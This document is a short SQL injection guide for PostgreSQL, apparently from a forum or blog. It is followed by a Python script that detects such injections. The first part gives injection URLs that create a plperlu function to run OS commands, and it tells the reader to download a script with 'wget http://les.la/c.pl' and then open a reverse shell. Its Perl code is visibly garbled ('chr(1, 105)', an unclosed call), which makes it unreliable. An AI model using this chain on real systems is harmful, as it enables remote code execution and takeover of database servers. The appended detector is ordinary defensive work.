create function id() RETURNS text AS $aaa$ open(FD, chr(108).chr(1, 105).chr(32).chr(124); return join(chr(0), <FD>); $aaa$ LANGUAGE plperlu;
select id();

id() is the name of the created function and can be customized. chr(108).chr(105) is the ASCII code of the command id to be executed. You can replace the command to be executed by using chr, specifically wget http://les.la/c.pl -O /tmp/c.pl. Delete the function with drop function id(), and then execute the reverse shell command.

This method works on all versions from 8.0 up (including 8.0).

The following is the actual injection format:

xxx.php?Id=10;create function id() RETURNS text AS $aaa$ open(FD, chr(108).chr(1, 105).chr(32).chr(124); return join(chr(0), <FD>); $aaa$ LANGUAGE plperlu;--

xxx.php?Id=10 and 1=2 union select null, id(), null--
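plperlu is an untrusted procedural language, and PostgreSQL only lets a superuser create functions in it, so the statements above succeed only when the web application connects with a superuser role. The following detection sketch is an added example, not code from the original page: it flags request parameters or logged statements of the shape shown above, and its rule names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Untrusted PostgreSQL languages (names ending in "u") can reach the OS.
UNTRUSTED_LANG = re.compile(
    r"\blanguage\s+\W?(plperlu|plpythonu|plpython2u|plpython3u|pltclu)\b", re.I)
CREATE_FUNC = re.compile(r"\bcreate\s+(or\s+replace\s+)?function\b", re.I)
# A second statement appended after ';' inside a single parameter value.
STACKED = re.compile(r";\s*(create|drop|select|copy|alter)\b", re.I)

# Constructed sample requests; the function body is elided on purpose.
SAMPLE_REQUESTS = [
    "Id=10",
    "Id=10%3Bcreate+function+id()+RETURNS+text+AS+%24aaa%24+...+%24aaa%24"
    "+LANGUAGE+plperlu%3B--",
    "Id=10%3Bdrop+function+id()",
]

def normalize(raw):
    """URL-decode twice (catches double encoding) and collapse whitespace."""
    text = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", text)

def classify(raw):
    """Return the list of findings for one query string or logged statement."""
    text = normalize(raw)
    findings = []
    if STACKED.search(text):
        findings.append("stacked-statement")
    if CREATE_FUNC.search(text):
        findings.append("create-function")
        if UNTRUSTED_LANG.search(text):
            findings.append("untrusted-language")
    return findings

def scan(requests):
    """Return (request, findings) pairs for every request that matched a rule."""
    return [(r, f) for r in requests if (f := classify(r))]

if __name__ == "__main__":
    for request, findings in scan(SAMPLE_REQUESTS):
        print(", ".join(findings), "<-", normalize(request))
```

A hit on untrusted-language is worth an alert on its own, since ordinary application traffic has no reason to create functions in those languages.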